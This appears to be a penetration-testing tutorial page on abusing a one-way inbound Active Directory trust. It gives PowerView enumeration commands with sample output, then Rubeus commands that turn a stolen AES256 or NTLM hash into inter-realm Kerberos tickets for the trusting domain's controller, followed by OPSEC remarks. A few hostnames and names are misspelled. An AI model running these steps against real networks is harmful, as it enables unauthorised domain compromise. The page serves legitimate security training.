One-Way Inbound Trust Abuse
One-Way Inbound Trust Abuse
A one-way inbound trusts looks like this
Get-DomainTrust
SourceName : trusteddomain.com
TargetName : trustingdomain.com
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection : Inbound
WhenCreated : 8/16/2022 9:52:37 AM
WhenChanged : 8/16/2022 9:52:37 AM
To abuse this kind of trust we'll make use of the users or groups with Foreign Domain Group Membership
(FDGM): users or groups from the first domain that are also trusted in the second one.
With valid domain credentials for these users we can access, scan and interact with the trusting domain.
To find users and groups with FDGM
PS C:\users\otter\desktop> Get-DomainForeignGroupMember -Domain trustingdomain.com
GroupDomain : trustingdomain.com
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=trustingdomain,DC=com
MemberDomain : trustingdomain.com
MemberName : S-1-5-21-569305411-121244042-2357301523-1120
for example, this output shows that there is a member of the Administrators
groups in the trusted domain that is not part of the domain directly, to check what user or group has this property we can convert the shown SID and we'll find that this group is in the trusted domain
PS C:\users\otter\desktop> ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120
TRUSTED\Worskstation Admins
PS C:\users\otter\desktop> Get-DomainGroupMember -Identity "Workstation Admins" | select MemberName
MemberName
----------
otter
Another way to get this information is using BloodHound with the Groups with Foreign Domain Group Membership
and Users with Foreign Domain Group Membership
queries.
To (ab)use this trust we need the RC4 or AES256_HMAC hash for the user with FDGM to ask a inter-realm TGT and TGS
PS C:\users\otter\desktop> Rubeus.exe asktgt /user:otter /domain:trusteddomain.com /aes256:<AES256_HMAC_HASH> /nowrap
PS C:\users\otter\desktop> Rubeus.exe asktgs /service:krbtgt/trustingdomain.com /domain:trusteddomain.com /dc:dc.trusteddomain.com /ticket:<BASE64_KIRBI_TICKET> /nowrap
Now we can request the inter-realm ticket
PS C:\users\otter\desktop> Rubeus.exe asktgs /service:cifs/dc.trustingdomain.com /domain:trustingdomain.com /dc:dc.trustringdomain.com /ticket:<BASE64_KIRBI_TICKET> /nowrap
OPSEC Considerations
It's good to highlight that, when we request the TGS for the trusted domain, we are shown the KeyType
of the ticket
PS C:\users\otter\desktop> Rubeus.exe asktgs /service:krbtgt/trustingdomain.com /domain:trusteddomain.com /dc:dc.trusteddomain.com /ticket:<BASE64_KIRBI_TICKET> /nowrap
...
KeyType : rc4_hmac
...
RC4 is the default key type so using a normal NTLM hash is also a viable option.